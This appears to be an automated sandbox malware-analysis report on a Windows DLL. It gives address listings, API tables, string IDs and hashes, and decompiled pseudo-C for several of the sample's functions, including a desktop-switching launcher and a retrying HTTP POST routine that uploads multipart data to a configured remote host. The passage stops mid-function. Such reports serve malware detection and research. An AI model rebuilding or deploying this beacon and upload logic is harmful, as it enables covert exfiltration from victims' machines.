                                                                                                                        0x6f339da3
                                                                                                                        0x6f339da9
                                                                                                                        0x6f339db4
                                                                                                                        0x6f339dba
                                                                                                                        0x6f339dd4
                                                                                                                        0x6f339dda
                                                                                                                        0x6f339dee
                                                                                                                        0x6f339df2
                                                                                                                        0x6f339e0c
                                                                                                                        0x6f339e10
                                                                                                                        0x6f339e76
                                                                                                                        0x6f339e76
                                                                                                                        0x6f339e84
                                                                                                                        0x6f339e86
                                                                                                                        0x6f339e86
                                                                                                                        0x6f339e8f
                                                                                                                        0x6f339e8f
                                                                                                                        0x6f339e9d
                                                                                                                        0x6f339ea2
                                                                                                                        0x6f339eaa
                                                                                                                        0x6f339eaf
                                                                                                                        0x6f339eaf
                                                                                                                        0x6f339eaa
                                                                                                                        0x6f339eb7
                                                                                                                        0x6f339eb7
                                                                                                                        0x6f339ed3
                                                                                                                        0x6f339ed5
                                                                                                                        0x6f339ed5
                                                                                                                        0x6f339ede
                                                                                                                        0x6f339ede
                                                                                                                        0x6f339eef
                                                                                                                        0x6f339ef3
                                                                                                                        0x6f339f04
                                                                                                                        0x6f339f06
                                                                                                                        0x6f339f11
                                                                                                                        0x6f339f19
                                                                                                                        0x6f339f1d
                                                                                                                        0x6f339f21
                                                                                                                        0x6f339f29
                                                                                                                        0x6f339f31
                                                                                                                        0x6f339f35
                                                                                                                        0x6f339f35
                                                                                                                        0x6f339f04
                                                                                                                        0x6f339f3b
                                                                                                                        0x6f339f3b
                                                                                                                        0x6f339f49
                                                                                                                        0x6f339f4b
                                                                                                                        0x6f339f4b
                                                                                                                        0x6f339f54
                                                                                                                        0x6f339f54
                                                                                                                        0x6f339f62
                                                                                                                        0x6f339f64
                                                                                                                        0x6f339f64
                                                                                                                        0x6f339f70
                                                                                                                        0x6f339f81
                                                                                                                        0x6f339f97
                                                                                                                        0x6f339fa9
                                                                                                                        0x6f339fa9
                                                                                                                        0x6f339fb5
                                                                                                                        0x6f339fbd
                                                                                                                        0x6f339fc2
                                                                                                                        0x6f339fc2
                                                                                                                        0x6f339fcb
                                                                                                                        0x6f339fcd
                                                                                                                        0x6f339fcd
                                                                                                                        0x6f339fd8
                                                                                                                        0x6f339fe0
                                                                                                                        0x6f339fe6
                                                                                                                        0x6f339fe9
                                                                                                                        0x6f339fe9
                                                                                                                        0x6f33a006
                                                                                                                        0x6f33a00a
                                                                                                                        0x6f33a01c
                                                                                                                        0x6f33a031
                                                                                                                        0x6f33a041
                                                                                                                        0x6f33a04b
                                                                                                                        0x6f33a059
                                                                                                                        0x6f33a060
                                                                                                                        0x6f33a068
                                                                                                                        0x6f33a068
                                                                                                                        0x6f33a072
                                                                                                                        0x6f33a072
                                                                                                                        0x6f33a097
                                                                                                                        0x6f33a09d
                                                                                                                        0x6f33a09d
                                                                                                                        0x6f33a0b5
                                                                                                                        0x6f33a0bd
                                                                                                                        0x6f33a0c8
                                                                                                                        0x6f33a0c8
                                                                                                                        0x6f33a0b5
                                                                                                                        0x6f33a0d8
                                                                                                                        0x6f33a0de
                                                                                                                        0x6f33a0de
                                                                                                                        0x6f33a0e3
                                                                                                                        0x6f33a0e9
                                                                                                                        0x6f33a0e9
                                                                                                                        0x6f33a0ed
                                                                                                                        0x6f33a0ef
                                                                                                                        0x6f33a0ef
                                                                                                                        0x6f33a0f5
                                                                                                                        0x6f33a0f7
                                                                                                                        0x6f33a0f7
                                                                                                                        0x6f33a0fd
                                                                                                                        0x6f33a103
                                                                                                                        0x6f33a109
                                                                                                                        0x6f33a10f
                                                                                                                        0x6f33a116
                                                                                                                        0x6f33a126

                                                                                                                        APIs
                                                                                                                        • SwitchDesktop.USER32(00000000), ref: 6F339D1E
                                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 6F339D2B
                                                                                                                        • CoInitializeEx.OLE32(00000000,00000006), ref: 6F339D36
                                                                                                                        • LoadLibraryA.KERNEL32(comctl32.dll), ref: 6F339D41
                                                                                                                        • GetCommandLineA.KERNEL32(?,00000001,FF000000), ref: 6F339D89
                                                                                                                          • Part of subcall function 6F33A3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6F33A3DB
                                                                                                                          • Part of subcall function 6F33A3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6F33A3F4
                                                                                                                        • wsprintfA.USER32 ref: 6F339DD4
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000020,?,?,?,?,?,?,00000001,FF000000), ref: 6F339DE8
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00001770,?,?,?,?,?,?,00000001,FF000000), ref: 6F339DFF
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6F339E06
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000060), ref: 6F339E1D
                                                                                                                        • LoadStringW.USER32 ref: 6F339E67
                                                                                                                        • LoadStringW.USER32(00000000,00000079,00000190,000000C8), ref: 6F339E80
                                                                                                                        • LoadStringW.USER32(00000000,0000007C,00000320,000003E8), ref: 6F339E99
                                                                                                                        • StrChrW.SHLWAPI(00000320,0000000A), ref: 6F339EA2
                                                                                                                        • FormatMessageW.KERNEL32(00000AFF,00000000,50000001,00000000,00000AF0,00000064,00000000), ref: 6F339ECB
                                                                                                                        • LoadStringW.USER32(00000000,000001B0,00000BB8,00000064), ref: 6F339EEB
                                                                                                                        • LoadStringW.USER32(00000000,000000F6,00000C80,00000064), ref: 6F339F00
                                                                                                                        • LoadStringW.USER32(00000000,0000007E,00000D48,00000064), ref: 6F339F45
                                                                                                                        • LoadStringW.USER32(00000000,0000007F,00000E10,00000064), ref: 6F339F5E
                                                                                                                        • LoadStringW.USER32(00000000,00000081,00000ED8,000000C8), ref: 6F339F7D
                                                                                                                        • PathGetDriveNumberA.SHLWAPI(?), ref: 6F339F8B
                                                                                                                        • PathBuildRootW.SHLWAPI(?,00000000), ref: 6F339F97
                                                                                                                        • GetVolumeInformationW.KERNEL32(?,00001068,00000064,00000000,00000000,00000000,00000000,00000000), ref: 6F339FB5
                                                                                                                        • wsprintfW.USER32 ref: 6F339FE0
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000105), ref: 6F339FFD
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F33A000
                                                                                                                        • wsprintfA.USER32 ref: 6F33A01C
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6F33A048
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6F33A04B
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 6F33A060
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 6F33A072
                                                                                                                        • FormatMessageW.KERNEL32(00000AFF,00000000,B0000002,00000000,00000000,000001F4,00000000), ref: 6F33A093
                                                                                                                        • FormatMessageW.KERNEL32(00000AFF,00000000,50000004,00000000,000003E8,00000064,00000000), ref: 6F33A0B1
                                                                                                                        • MessageBoxW.USER32(00000000,00000000,000003E8,00000040), ref: 6F33A0BD
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 6F33A0C8
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F33A0D1
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F33A0D8
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6F33A0E3
                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 6F33A0EF
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,FF000000), ref: 6F33A0F7
                                                                                                                        • CoUninitialize.OLE32 ref: 6F33A0FD
                                                                                                                        • SwitchDesktop.USER32(00000000), ref: 6F33A109
                                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 6F33A116
                                                                                                                          • Part of subcall function 6F331DB0: lstrlenA.KERNEL32(?,?,00000000,?,?,?,?,6F339D7B), ref: 6F331E3E
                                                                                                                          • Part of subcall function 6F331DB0: RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 6F331E48
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Load$HeapString$Free$DesktopLibraryMessageProcess$AllocFormatSleepwsprintf$LocalPathSwitchThreadlstrlen$BuildCommandComputeCrc32DriveInformationInitializeLineMemoryNumberRootUninitializeVolumeZero
                                                                                                                        • String ID: %s%s$/c start /b "" "%s" f w %d$<n/a>$DFDWiz.exe$`$comctl32.dll
                                                                                                                        • API String ID: 3108343870-2776518243
                                                                                                                        • Opcode ID: 8e95be077a2cb04ddde8d3ab971cf846188fd3db7615309fe69130f1affebdbb
                                                                                                                        • Instruction ID: fc877c8d6a33d97534f31cc0a69ba9fb648d905e22f708a5f35fd157cffaf9bb
                                                                                                                        • Opcode Fuzzy Hash: 8e95be077a2cb04ddde8d3ab971cf846188fd3db7615309fe69130f1affebdbb
                                                                                                                        • Instruction Fuzzy Hash: B3B1937254478AAFEB20DFA0CC85F9B7BADEB45B10F00481CF255961C0DBB5E414CB26
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F335690, Relevance: 72.0, APIs: 33, Strings: 8, Instructions: 281networkmemorysleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E6F335690() {
				char* _t71;
				long _t87;
				void* _t100;
				intOrPtr _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t107;
				void* _t108;
				void* _t109;
				void* _t111;
				CHAR* _t114;
				int _t115;
				long _t116;
				long _t119;
				void* _t122;
				intOrPtr _t146;
				void* _t147;
				void* _t149;
				intOrPtr _t150;
				void* _t151;
				void* _t152;
				int _t153;
				intOrPtr _t154;
				void* _t156;
				void* _t157;

				 *((intOrPtr*)(_t156 + 0x20)) = 0;
				 *(_t156 + 0x1c) = 0;
				_t3 = GetTickCount() + 0x493e0; // 0x493e0
				_t146 = _t3;
				 *((intOrPtr*)(_t156 + 0x38)) = _t146;
				while(1) {
					_t150 =  *((intOrPtr*)(_t156 + 0x40));
					 *(_t156 + 0x18) = 0x842a0000;
					if( *(_t150 + 0xc) != 0) {
						 *(_t156 + 0x18) = 0x84aa3300;
					}
					_t71 = M6F340518; // 0x749bb0
					_t152 = InternetOpenA(_t71, 1, 0, 0, 0);
					 *(_t156 + 0x30) = _t152;
					if(_t152 == 0) {
						L28:
						if(GetTickCount() >= _t146) {
							L32:
							return  *((intOrPtr*)(_t156 + 0x20));
						}
						Sleep(0x1388);
						continue;
					}
					 *((intOrPtr*)(_t156 + 0x20)) = 0x4e20;
					InternetSetOptionA(_t152, 2, _t156 + 0x14, 4);
					InternetSetOptionA(_t152, 5, _t156 + 0x14, 4);
					InternetSetOptionA(_t152, 6, _t156 + 0x14, 4);
					asm("sbb ecx, ecx");
					_t147 = InternetConnectA(_t152,  *(_t150 + 4), ( ~( *(_t150 + 0xc)) & 0x0000016b) + 0x50, 0, 0, 3, 0, 0);
					 *(_t156 + 0x34) = _t147;
					if(_t147 == 0) {
						L26:
						InternetCloseHandle(_t152);
						if( *(_t156 + 0x1c) != 0) {
							goto L32;
						}
						_t146 =  *((intOrPtr*)(_t156 + 0x38));
						goto L28;
					}
					_t122 = HttpOpenRequestA(_t147, "POST",  *(_t150 + 8), "HTTP/1.1", 0, 0,  *(_t156 + 0x18), 0);
					if(_t122 == 0) {
						L25:
						InternetCloseHandle(_t147);
						goto L26;
					}
					_t151 = HeapAlloc(GetProcessHeap(), 8, 0x800);
					if(_t151 == 0) {
						L24:
						InternetCloseHandle(_t122);
						_t147 =  *(_t156 + 0x34);
						goto L25;
					}
					_t87 = wsprintfA(_t151, "%s", "Connection: close\r\n");
					_t156 = _t156 + 0xc;
					HttpAddRequestHeadersA(_t122, _t151, _t87, 0xa0000000);
					_t153 = 0;
					 *((intOrPtr*)(_t156 + 0x24)) = 0;
					 *((intOrPtr*)(_t156 + 0x28)) = 0;
					 *(_t156 + 0x18) = 0;
					 *(_t156 + 0x30) = GetTickCount();
					 *(_t156 + 0x1c) = RtlRandom(_t156 + 0x2c);
					_t149 = HeapAlloc(GetProcessHeap(), 8, 0x800);
					if(_t149 != 0) {
						 *(_t156 + 0x34) = _t149;
						_t153 = wsprintfA(_t149, "----------%lu\r\nContent-Disposition: form-data; name=\"%s\"\r\nContent-Type: text/plain\r\nContent-Transfer-Encoding: binary\r\n\r\n",  *(_t156 + 0x14),  *(_t156 + 0x44));
						_t30 = _t153 + 1; // 0x1
						_t114 = _t149 + _t30;
						 *(_t156 + 0x44) = _t114;
						_t115 = wsprintfA(_t114, "----------%lu--\r\n\r\n",  *((intOrPtr*)(_t156 + 0x24)));
						_t133 =  *((intOrPtr*)(_t156 + 0x5c));
						 *(_t156 + 0x34) = _t115;
						_t116 = wsprintfA(_t151, "Content-Length: %lu\r\n",  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x5c)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x5c)) + 0x20)) +  *((intOrPtr*)(_t133 + 0x18)) + _t115 + _t153);
						_t157 = _t156 + 0x28;
						HttpAddRequestHeadersA(_t122, _t151, _t116, 0xa0000000);
						_t119 = wsprintfA(_t151, "Content-Type: multipart/form-data; boundary=--------%lu\r\n",  *((intOrPtr*)(_t157 + 0x14)));
						_t156 = _t157 + 0xc;
						HttpAddRequestHeadersA(_t122, _t151, _t119, 0xa0000000);
					}
					if(HttpSendRequestExA(_t122, 0, 0, 0, 0) == 0) {
						if(GetLastError() == 0x2f7d) {
							 *( *((intOrPtr*)(_t156 + 0x40)) + 0xc) = 0;
						}
						L21:
						if(_t149 != 0) {
							HeapFree(GetProcessHeap(), 0, _t149);
						}
						HeapFree(GetProcessHeap(), 0, _t151);
						_t152 =  *(_t156 + 0x30);
						goto L24;
					}
					 *((intOrPtr*)(_t156 + 0x20)) = _t153;
					_t100 = E6F3354E0(_t122,  *((intOrPtr*)(_t156 + 0x24)), _t156 + 0x14);
					_t156 = _t156 + 0xc;
					_t154 =  *((intOrPtr*)(_t156 + 0x40));
					if(_t100 != _t153) {
						L19:
						HttpEndRequestA(_t122, 0, 0, 0);
						if( *(_t156 + 0x1c) != 0) {
							_t102 = E6F335540(_t122, _t154 + 0x2c);
							_t156 = _t156 + 8;
							 *((intOrPtr*)(_t156 + 0x20)) = _t102;
						}
						goto L21;
					}
					_t103 = _t154 + 0x18;
					if( *((intOrPtr*)(_t154 + 0x18)) == 0) {
						L13:
						_t104 = _t154 + 0x20;
						if( *((intOrPtr*)(_t154 + 0x20)) == 0) {
							L15:
							_t105 = _t154 + 0x28;
							if( *((intOrPtr*)(_t154 + 0x28)) == 0) {
								L17:
								 *(_t156 + 0x30) =  *(_t156 + 0x18);
								_t107 = E6F3354E0(_t122,  *((intOrPtr*)(_t156 + 0x28)), _t156 + 0x24);
								_t156 = _t156 + 0xc;
								if(_t107 ==  *(_t156 + 0x18)) {
									 *(_t156 + 0x1c) = 1;
								}
								goto L19;
							}
							_t108 = E6F3354E0(_t122,  *((intOrPtr*)(_t154 + 0x24)), _t105);
							_t156 = _t156 + 0xc;
							if(_t108 !=  *((intOrPtr*)(_t154 + 0x28))) {
								goto L19;
							}
							goto L17;
						}
						_t109 = E6F3354E0(_t122,  *((intOrPtr*)(_t154 + 0x1c)), _t104);
						_t156 = _t156 + 0xc;
						if(_t109 !=  *((intOrPtr*)(_t154 + 0x20))) {
							goto L19;
						}
						goto L15;
					}
					_t111 = E6F3354E0(_t122,  *((intOrPtr*)(_t154 + 0x14)), _t103);
					_t156 = _t156 + 0xc;
					if(_t111 !=  *((intOrPtr*)(_t154 + 0x18))) {
						goto L19;
					}
					goto L13;
				}
			}





























                                                                                                                        0x6f335699
                                                                                                                        0x6f33569d
                                                                                                                        0x6f3356a7
                                                                                                                        0x6f3356a7
                                                                                                                        0x6f3356ad
                                                                                                                        0x6f3356c0
                                                                                                                        0x6f3356c0
                                                                                                                        0x6f3356c8
                                                                                                                        0x6f3356d0
                                                                                                                        0x6f3356d2
                                                                                                                        0x6f3356d2
                                                                                                                        0x6f3356da
                                                                                                                        0x6f3356ee
                                                                                                                        0x6f3356f0
                                                                                                                        0x6f3356f6
                                                                                                                        0x6f3359bd
                                                                                                                        0x6f3359c5
                                                                                                                        0x6f3359f1
                                                                                                                        0x6f3359fc
                                                                                                                        0x6f3359fc
                                                                                                                        0x6f3359cc
                                                                                                                        0x00000000
                                                                                                                        0x6f3359cc
                                                                                                                        0x6f33570c
                                                                                                                        0x6f335714
                                                                                                                        0x6f335720
                                                                                                                        0x6f33572c
                                                                                                                        0x6f33573e
                                                                                                                        0x6f335754
                                                                                                                        0x6f335756
                                                                                                                        0x6f33575c
                                                                                                                        0x6f3359ab
                                                                                                                        0x6f3359ac
                                                                                                                        0x6f3359b7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3359b9
                                                                                                                        0x00000000
                                                                                                                        0x6f3359b9
                                                                                                                        0x6f335782
                                                                                                                        0x6f335786
                                                                                                                        0x6f3359a4
                                                                                                                        0x6f3359a5
                                                                                                                        0x00000000
                                                                                                                        0x6f3359a5
                                                                                                                        0x6f3357a2
                                                                                                                        0x6f3357a6
                                                                                                                        0x6f335999
                                                                                                                        0x6f33599a
                                                                                                                        0x6f3359a0
                                                                                                                        0x00000000
                                                                                                                        0x6f3359a0
                                                                                                                        0x6f3357b7
                                                                                                                        0x6f3357bd
                                                                                                                        0x6f3357c8
                                                                                                                        0x6f3357ce
                                                                                                                        0x6f3357d0
                                                                                                                        0x6f3357d4
                                                                                                                        0x6f3357d8
                                                                                                                        0x6f3357e7
                                                                                                                        0x6f3357f8
                                                                                                                        0x6f335805
                                                                                                                        0x6f335809
                                                                                                                        0x6f33581f
                                                                                                                        0x6f33582e
                                                                                                                        0x6f335830
                                                                                                                        0x6f335830
                                                                                                                        0x6f33583a
                                                                                                                        0x6f33583e
                                                                                                                        0x6f335844
                                                                                                                        0x6f33584e
                                                                                                                        0x6f335860
                                                                                                                        0x6f335866
                                                                                                                        0x6f335871
                                                                                                                        0x6f335882
                                                                                                                        0x6f335888
                                                                                                                        0x6f335893
                                                                                                                        0x6f335893
                                                                                                                        0x6f3358aa
                                                                                                                        0x6f3359e2
                                                                                                                        0x6f3359e8
                                                                                                                        0x6f3359e8
                                                                                                                        0x6f335971
                                                                                                                        0x6f335973
                                                                                                                        0x6f33597f
                                                                                                                        0x6f33597f
                                                                                                                        0x6f33598f
                                                                                                                        0x6f335995
                                                                                                                        0x00000000
                                                                                                                        0x6f335995
                                                                                                                        0x6f3358bb
                                                                                                                        0x6f3358bf
                                                                                                                        0x6f3358c4
                                                                                                                        0x6f3358c9
                                                                                                                        0x6f3358cd
                                                                                                                        0x6f33594c
                                                                                                                        0x6f335953
                                                                                                                        0x6f33595e
                                                                                                                        0x6f335965
                                                                                                                        0x6f33596a
                                                                                                                        0x6f33596d
                                                                                                                        0x6f33596d
                                                                                                                        0x00000000
                                                                                                                        0x6f33595e
                                                                                                                        0x6f3358d3
                                                                                                                        0x6f3358d6
                                                                                                                        0x6f3358eb
                                                                                                                        0x6f3358ef
                                                                                                                        0x6f3358f2
                                                                                                                        0x6f335907
                                                                                                                        0x6f33590b
                                                                                                                        0x6f33590e
                                                                                                                        0x6f335923
                                                                                                                        0x6f335932
                                                                                                                        0x6f335936
                                                                                                                        0x6f33593b
                                                                                                                        0x6f335942
                                                                                                                        0x6f335944
                                                                                                                        0x6f335944
                                                                                                                        0x00000000
                                                                                                                        0x6f335942
                                                                                                                        0x6f335916
                                                                                                                        0x6f33591b
                                                                                                                        0x6f335921
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335921
                                                                                                                        0x6f3358fa
                                                                                                                        0x6f3358ff
                                                                                                                        0x6f335905
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335905
                                                                                                                        0x6f3358de
                                                                                                                        0x6f3358e3
                                                                                                                        0x6f3358e9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3358e9

                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F3356A1
                                                                                                                        • InternetOpenA.WININET(00749BB0,00000001,00000000,00000000,00000000), ref: 6F3356E8
                                                                                                                        • InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 6F335714
                                                                                                                        • InternetSetOptionA.WININET(00000000,00000005,?,00000004), ref: 6F335720
                                                                                                                        • InternetSetOptionA.WININET(00000000,00000006,?,00000004), ref: 6F33572C
                                                                                                                        • InternetConnectA.WININET(00000000,?,-00000050,00000000,00000000,00000003,00000000,00000000), ref: 6F33574E
                                                                                                                        • HttpOpenRequestA.WININET(00000000,POST,00000001,HTTP/1.1,00000000,00000000,84AA3300,00000000), ref: 6F33577C
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800), ref: 6F335793
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3357A0
                                                                                                                        • wsprintfA.USER32 ref: 6F3357B7
                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6F3357C8
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F3357DC
                                                                                                                        • RtlRandom.NTDLL(?), ref: 6F3357EB
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F3357FC
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F335803
                                                                                                                        • wsprintfA.USER32 ref: 6F335823
                                                                                                                        • wsprintfA.USER32 ref: 6F33583E
                                                                                                                        • wsprintfA.USER32 ref: 6F335860
                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6F335871
                                                                                                                        • wsprintfA.USER32 ref: 6F335882
                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6F335893
                                                                                                                        • HttpSendRequestExA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 6F3358A2
                                                                                                                        • HttpEndRequestA.WININET(00000000,00000000,00000000,00000000), ref: 6F335953
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F335978
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F33597F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F335988
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F33598F
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F33599A
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F3359A5
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F3359AC
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F3359BD
                                                                                                                        • Sleep.KERNEL32(00001388), ref: 6F3359CC
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F3359D7
                                                                                                                        Strings
                                                                                                                        • N, xrefs: 6F33570C
                                                                                                                        • POST, xrefs: 6F335776
                                                                                                                        • ----------%lu--, xrefs: 6F335834
                                                                                                                        • HTTP/1.1, xrefs: 6F335770
                                                                                                                        • Connection: close, xrefs: 6F3357AC
                                                                                                                        • Content-Type: multipart/form-data; boundary=--------%lu, xrefs: 6F33587C
                                                                                                                        • ----------%luContent-Disposition: form-data; name="%s"Content-Type: text/plainContent-Transfer-Encoding: binary, xrefs: 6F335819
                                                                                                                        • Content-Length: %lu, xrefs: 6F33585A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInternet$HttpRequest$wsprintf$Process$CloseCountHandleHeadersOptionTick$AllocFreeOpen$ConnectErrorLastRandomSendSleep
                                                                                                                        • String ID: N$----------%luContent-Disposition: form-data; name="%s"Content-Type: text/plainContent-Transfer-Encoding: binary$----------%lu--$Connection: close$Content-Length: %lu$Content-Type: multipart/form-data; boundary=--------%lu$HTTP/1.1$POST
                                                                                                                        • API String ID: 2546452625-2948876467
                                                                                                                        • Opcode ID: 7ea32a9263ea2d0d4593151da6547690d3d73eaba6db73f7a05648d3d57ff80b
                                                                                                                        • Instruction ID: f412cc8f9967b57926f4c2b9cbef0be47c390b5ab26ad302e6127e584bc072b0
                                                                                                                        • Opcode Fuzzy Hash: 7ea32a9263ea2d0d4593151da6547690d3d73eaba6db73f7a05648d3d57ff80b
                                                                                                                        • Instruction Fuzzy Hash: A5A1CFB290438AAFD750DF24CC89F6B7BEDEF89725F00051CFA4596180DB74E8548BA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3356B3, Relevance: 68.5, APIs: 31, Strings: 8, Instructions: 258networkmemorysleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E6F3356B3() {
				char* _t65;
				long _t81;
				void* _t94;
				intOrPtr _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				CHAR* _t108;
				int _t109;
				long _t110;
				long _t113;
				void* _t117;
				intOrPtr _t141;
				void* _t143;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				void* _t149;
				int _t151;
				intOrPtr _t152;
				void* _t154;
				void* _t156;

				while(1) {
					_t146 =  *((intOrPtr*)(_t154 + 0x40));
					 *(_t154 + 0x18) = 0x842a0000;
					if( *(_t146 + 0xc) != 0) {
						 *(_t154 + 0x18) = 0x84aa3300;
					}
					_t65 = M6F340518; // 0x749bb0
					_t149 = InternetOpenA(_t65, 1, 0, 0, 0);
					 *(_t154 + 0x30) = _t149;
					if(_t149 == 0) {
						L28:
						if(GetTickCount() >= _t141) {
							L32:
							return  *((intOrPtr*)(_t154 + 0x20));
						}
						Sleep(0x1388);
						continue;
					}
					 *((intOrPtr*)(_t154 + 0x20)) = 0x4e20;
					InternetSetOptionA(_t149, 2, _t154 + 0x14, 4);
					InternetSetOptionA(_t149, 5, _t154 + 0x14, 4);
					InternetSetOptionA(_t149, 6, _t154 + 0x14, 4);
					asm("sbb ecx, ecx");
					_t143 = InternetConnectA(_t149,  *(_t146 + 4), ( ~( *(_t146 + 0xc)) & 0x0000016b) + 0x50, 0, 0, 3, 0, 0);
					 *(_t154 + 0x34) = _t143;
					if(_t143 == 0) {
						L26:
						InternetCloseHandle(_t149);
						if( *(_t154 + 0x1c) != 0) {
							goto L32;
						}
						_t141 =  *((intOrPtr*)(_t154 + 0x38));
						goto L28;
					}
					_t117 = HttpOpenRequestA(_t143, "POST",  *(_t146 + 8), "HTTP/1.1", 0, 0,  *(_t154 + 0x18), 0);
					if(_t117 == 0) {
						L25:
						InternetCloseHandle(_t143);
						goto L26;
					}
					_t148 = HeapAlloc(GetProcessHeap(), 8, 0x800);
					if(_t148 == 0) {
						L24:
						InternetCloseHandle(_t117);
						_t143 =  *(_t154 + 0x34);
						goto L25;
					}
					_t81 = wsprintfA(_t148, "%s", "Connection: close\r\n");
					_t154 = _t154 + 0xc;
					HttpAddRequestHeadersA(_t117, _t148, _t81, 0xa0000000);
					_t151 = 0;
					 *((intOrPtr*)(_t154 + 0x24)) = 0;
					 *((intOrPtr*)(_t154 + 0x28)) = 0;
					 *(_t154 + 0x18) = 0;
					 *(_t154 + 0x30) = GetTickCount();
					 *(_t154 + 0x1c) = RtlRandom(_t154 + 0x2c);
					_t145 = HeapAlloc(GetProcessHeap(), 8, 0x800);
					if(_t145 != 0) {
						 *(_t154 + 0x34) = _t145;
						_t151 = wsprintfA(_t145, "----------%lu\r\nContent-Disposition: form-data; name=\"%s\"\r\nContent-Type: text/plain\r\nContent-Transfer-Encoding: binary\r\n\r\n",  *(_t154 + 0x14),  *(_t154 + 0x44));
						_t26 = _t151 + 1; // 0x1
						_t108 = _t145 + _t26;
						 *(_t154 + 0x44) = _t108;
						_t109 = wsprintfA(_t108, "----------%lu--\r\n\r\n",  *((intOrPtr*)(_t154 + 0x24)));
						_t128 =  *((intOrPtr*)(_t154 + 0x5c));
						 *(_t154 + 0x34) = _t109;
